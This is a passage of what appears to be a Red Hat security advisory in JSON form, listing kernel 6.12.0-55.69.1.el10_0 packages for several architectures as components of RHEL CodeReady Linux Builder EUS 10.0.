"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
